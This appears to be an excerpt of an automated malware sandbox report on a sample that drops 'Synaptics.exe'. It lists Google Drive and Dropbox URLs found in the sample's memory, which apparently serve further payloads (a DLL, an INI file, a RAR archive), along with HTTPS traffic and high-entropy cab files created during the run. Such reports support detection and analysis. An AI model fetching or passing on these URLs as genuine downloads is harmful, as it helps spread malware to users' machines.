Source: Synaptics.exe, 00000003.00000003.2733811856.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2756588273.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2745845136.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.00000000006ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/
Source: Synaptics.exe, 00000003.00000003.2733811856.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2745845136.000000000077D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/.
Source: Synaptics.exe, 00000003.00000002.3900442657.00000000006ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/google.com/ta
Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
Source: file.exe | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                          Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                          Source: file.exeString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                          Source: Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2701819372.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                          Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                          Source: Synaptics.exe, 00000003.00000003.2745845136.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogletagservices-cn.com
                          Source: Synaptics.exe, 00000003.00000003.2756588273.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.0000000000777000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                          Source: ~DF26C05A2AD06F381B.TMP.5.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                          Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                          Source: Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/~
                          Source: Synaptics.exe, 00000003.00000003.2723135790.0000000000784000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.go
                          Source: Synaptics.exe, 00000003.00000003.2745845136.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2723135790.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2756588273.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2733811856.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.0000000000777000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                          Source: Synaptics.exe, 00000003.00000003.2745845136.0000000000786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                          Source: Synaptics.exe, 00000003.00000002.3900442657.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                          Source: Synaptics.exe, 00000003.00000003.2745845136.0000000000786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                          Source: Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                          Source: Synaptics.exe, 00000003.00000002.3900442657.0000000000786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download13I
                          Source: Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                          Source: Synaptics.exe, 00000003.00000002.3900442657.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd$
                          Source: Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                          Source: Synaptics.exe, 00000003.00000003.2745845136.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2723135790.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2756588273.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2733811856.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.0000000000777000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/q
                          Source: dxwsetup.exe, 00000004.00000003.2183407168.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000003.2155297064.0000000000CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                          Source: file.exeString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                          Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                          Source: file.exeString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                          Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlX
                          Source: ~DF26C05A2AD06F381B.TMP.5.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                          Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:50021 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.5:50022 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:50024 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:50027 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS45C6EA.tmp\Aug2009_d3dcsx_42_x86.cab entropy: 7.99929609474
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Jun2010_d3dx11_43_x86[1].cab entropy: 7.9918106197
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Jun2010_d3dx10_43_x86.cab entropy: 7.99666344587
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Jun2010_d3dx10_43_x86[1].cab entropy: 7.99666344587
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Jun2010_d3dx9_43_x86.cab entropy: 7.99938038089
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS45DFF0.tmp\Jun2010_d3dx9_43_x86.cab entropy: 7.99938038089
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Jun2010_d3dx9_43_x86[1].cab entropy: 7.99938038089
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Aug2009_D3DCompiler_42_x86.cab entropy: 7.99844166401
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS45D83F.tmp\Aug2009_D3DCompiler_42_x86.cab entropy: 7.99844166401
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Aug2009_D3DCompiler_42_x86[1].cab entropy: 7.99844166401
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dcsx_42_x86.cab entropy: 7.99929609474
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS45E7A1.tmp\Jun2010_d3dx10_43_x86.cab entropy: 7.99666344587
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Feb2005_d3dx9_24_x64.cab entropy: 7.99956721817
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS46029B.tmp\Feb2005_d3dx9_24_x64.cab entropy: 7.99956721817
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Feb2005_d3dx9_24_x64[1].cab entropy: 7.99956721817
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Jun2010_D3DCompiler_43_x86.cab entropy: 7.99831524311
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS45FA8D.tmp\Jun2010_D3DCompiler_43_x86.cab entropy: 7.99831524311
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Jun2010_D3DCompiler_43_x86[1].cab entropy: 7.99831524311
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Jun2010_d3dcsx_43_x86.cab entropy: 7.99695515494
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS45F2EB.tmp\Jun2010_d3dcsx_43_x86.cab entropy: 7.99695515494
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Jun2010_d3dcsx_43_x86[1].cab entropy: 7.99695515494
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Jun2010_d3dx11_43_x86.cab entropy: 7.9918106197
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS45ED6D.tmp\Jun2010_d3dx11_43_x86.cab entropy: 7.9918106197
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS461E41.tmp\Aug2005_d3dx9_27_x64.cab entropy: 7.99967199939
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Aug2005_d3dx9_27_x64[1].cab entropy: 7.99967199939
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Jun2005_d3dx9_26_x64.cab entropy: 7.9996191239
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS461568.tmp\Jun2005_d3dx9_26_x64.cab entropy: 7.9996191239
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Jun2005_d3dx9_26_x64[1].cab entropy: 7.9996191239
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Apr2005_d3dx9_25_x64.cab entropy: 7.99971456955
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS460B75.tmp\Apr2005_d3dx9_25_x64.cab entropy: 7.99971456955
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Apr2005_d3dx9_25_x64[1].cab entropy: 7.99971456955
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Feb2006_XACT_x64[1].cab entropy: 7.99567918868
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Feb2006_xact_x86.cab entropy: 7.99214177755
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS463B2F.tmp\Feb2006_xact_x86.cab entropy: 7.99214177755
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Feb2006_XACT_x86[1].cab entropy: 7.99214177755
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Feb2006_d3dx9_29_x64.cab entropy: 7.99967777757
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS463227.tmp\Feb2006_d3dx9_29_x64.cab entropy: 7.99967777757
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Feb2006_d3dx9_29_x64[1].cab entropy: 7.99967777757
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Dec2005_d3dx9_28_x64.cab entropy: 7.9996739284
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS462805.tmp\Dec2005_d3dx9_28_x64.cab entropy: 7.9996739284
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Dec2005_d3dx9_28_x64[1].cab entropy: 7.9996739284
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Aug2005_d3dx9_27_x64.cab entropy: 7.99967199939
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Apr2006_xact_x64.cab entropy: 7.9963671694
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS4655FB.tmp\Apr2006_xact_x64.cab entropy: 7.9963671694
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Apr2006_XACT_x64[1].cab entropy: 7.9963671694
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Apr2006_xact_x86.cab entropy: 7.99281124378
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS465000.tmp\Apr2006_xact_x86.cab entropy: 7.99281124378
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Apr2006_xact_x86[1].cab entropy: 7.99281124378
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Apr2006_d3dx9_30_x64.cab entropy: 7.99967825236
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS46467A.tmp\Apr2006_d3dx9_30_x64.cab entropy: 7.99967825236
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Apr2006_d3dx9_30_x64[1].cab entropy: 7.99967825236
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Feb2006_xact_x64.cab entropy: 7.99567918868
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS4640BD.tmp\Feb2006_xact_x64.cab entropy: 7.99567918868
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS466CA0.tmp\Aug2006_xact_x64.cab entropy: 7.99568599131
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Aug2006_xact_x64[1].cab entropy: 7.99568599131
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Aug2006_xact_x86.cab entropy: 7.99387234818
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS466702.tmp\Aug2006_xact_x86.cab entropy: 7.99387234818
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Aug2006_xact_x86[1].cab entropy: 7.99387234818
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Jun2006_xact_x64.cab entropy: 7.9960175906
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS466117.tmp\Jun2006_xact_x64.cab entropy: 7.9960175906
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\JUN2006_XACT_x64[1].cab entropy: 7.9960175906
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Jun2006_xact_x86.cab entropy: 7.99289442832
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS465B98.tmp\Jun2006_xact_x86.cab entropy: 7.99289442832
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\JUN2006_XACT_x86[1].cab entropy: 7.99289442832
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\DEC2006_d3dx9_32_x64[1].cab entropy: 7.99975750886
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Oct2006_xact_x64.cab entropy: 7.99644077128
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS4681BE.tmp\Oct2006_xact_x64.cab entropy: 7.99644077128
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\OCT2006_XACT_x64[1].cab entropy: 7.99644077128
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Oct2006_xact_x86.cab entropy: 7.99419790986
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS467BE2.tmp\Oct2006_xact_x86.cab entropy: 7.99419790986
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\OCT2006_XACT_x86[1].cab entropy: 7.99419790986
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Oct2006_d3dx9_31_x64.cab entropy: 7.99968945572
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS46728B.tmp\Oct2006_d3dx9_31_x64.cab entropy: 7.99968945572
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\OCT2006_d3dx9_31_x64[1].cab entropy: 7.99968945572
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Aug2006_xact_x64.cab entropy: 7.99568599131
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS46911F.tmp\Dec2006_xact_x86.cab entropy: 7.9939423459
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Dec2006_xact_x86[1].cab entropy: 7.9939423459
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx9_32_x64.cab entropy: 7.99975750886
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS46876B.tmp\Dec2006_d3dx9_32_x64.cab entropy: 7.99975750886
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS4696FB.tmp\Dec2006_xact_x64.cab entropy: 7.99761851304
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Dec2006_xact_x64[1].cab entropy: 7.99761851304
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Apr2007_d3dx9_33_x64[1].cab entropy: 7.99980407083
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Feb2007_xact_x64.cab entropy: 7.99592167011
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS46A2D3.tmp\Feb2007_xact_x64.cab entropy: 7.99592167011
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FEB2007_XACT_x64[1].cab entropy: 7.99592167011
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Feb2007_xact_x86.cab entropy: 7.99397256556
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS469D26.tmp\Feb2007_xact_x86.cab entropy: 7.99397256556
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\FEB2007_XACT_x86[1].cab entropy: 7.99397256556
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Dec2006_xact_x64.cab entropy: 7.99761851304
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Dec2006_xact_x86.cab entropy: 7.9939423459
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Jun2007_d3dx9_34_x86[1].cab entropy: 7.99906642826
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS4528C5.tmp\Jun2007_d3dx9_34_x86.cab entropy: 7.99906642826
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx9_34_x86.cab entropy: 7.99906642826
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Apr2007_d3dx10_33_x86[1].cab entropy: 7.99896802841
